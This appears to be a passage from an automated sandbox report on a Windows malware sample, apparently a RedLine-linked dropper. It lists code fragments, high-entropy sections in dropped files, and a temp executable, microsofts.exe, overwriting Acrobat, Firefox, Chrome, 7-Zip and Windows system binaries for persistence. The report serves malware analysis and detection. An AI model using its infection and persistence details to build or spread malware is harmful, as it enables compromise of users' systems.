                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF7FBFh; ret 4_2_04AF831F
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF7FA8h; ret 4_2_04AF834C
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF84BAh; ret 4_2_04AF83E2
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF8426h; ret 4_2_04AF84D8
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF8075h; ret 4_2_04AF84FD
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF808Ch; ret 4_2_04AF8512
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF8B6Fh; ret 4_2_04AF8596
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF8E94h; ret 4_2_04AF85C9
                            Source: Native_Redline_BTC.exe.4.dr Static PE information: section name: .text entropy: 7.954598996291746
                            Source: Acrobat.exe.5.dr Static PE information: section name: .reloc entropy: 7.8576184835751715
                            Source: Aut2exe.exe.5.dr Static PE information: section name: .rsrc entropy: 7.800635454777948
                            Source: Aut2exe_x64.exe.5.dr Static PE information: section name: .rsrc entropy: 7.800488144393949
                            Source: setup.exe.5.dr Static PE information: section name: .rsrc entropy: 7.6446905292307115
                            Source: AutoIt3_x64.exe.5.dr Static PE information: section name: .reloc entropy: 7.943916918732901
                            Source: appvcleaner.exe.5.dr Static PE information: section name: .reloc entropy: 7.9356357834661635
                            Source: SciTE.exe.5.dr Static PE information: section name: .reloc entropy: 7.912295186276781
                            Source: IntegratedOffice.exe.5.dr Static PE information: section name: .reloc entropy: 7.926760749697762
                            Source: OfficeC2RClient.exe.5.dr Static PE information: section name: .reloc entropy: 7.71655749372354
                            Source: officesvcmgr.exe.5.dr Static PE information: section name: .reloc entropy: 7.937217171394089
                            Source: chrome_pwa_launcher.exe.5.dr Static PE information: section name: .reloc entropy: 7.9405684282494935
                            Source: chrmstp.exe.5.dr Static PE information: section name: .reloc entropy: 7.941019211695992
                            Source: jucheck.exe.5.dr Static PE information: section name: .reloc entropy: 7.9310613102351475
                            Source: jusched.exe.5.dr Static PE information: section name: .reloc entropy: 7.936029055064351
                            Source: AppVClient.exe.5.dr Static PE information: section name: .reloc entropy: 7.936511844127285
                            Source: FXSSVC.exe.5.dr Static PE information: section name: .reloc entropy: 7.942261525543949
                            Source: 117.0.5938.132_chrome_installer.exe.5.dr Static PE information: section name: .reloc entropy: 7.934753535759687
                            Source: elevation_service.exe.5.dr Static PE information: section name: .reloc entropy: 7.9439315647986515
                            Source: elevation_service.exe0.5.dr Static PE information: section name: .reloc entropy: 7.945943261592593
                            Source: Native_Redline_BTC.exe.4.dr, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'vBXN2xV7mCTjW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                            Source: 4.2.svchost.exe.6000000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'vBXN2xV7mCTjW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                            Persistence and Installation Behavior

                            Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\97dd988331e417df.bin
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe (11 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe (14 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe (14 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe (11 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe (11 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe (14 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe (11 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe (14 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe (14 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe (11 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe (11 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe (14 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe (14 identical entries)
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe (14 identical entries)
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Mozilla Firefox\firefox.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Mozilla Firefox\pingsender.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\vds.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\alg.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\7-Zip\7zFM.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\snmptrap.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\Spectrum.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\Locator.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\7-Zip\7z.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\AppVClient.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\SysWOW64\perfhost.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\7-Zip\7zG.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\msiexec.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\VSSVC.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\wbengine.exe
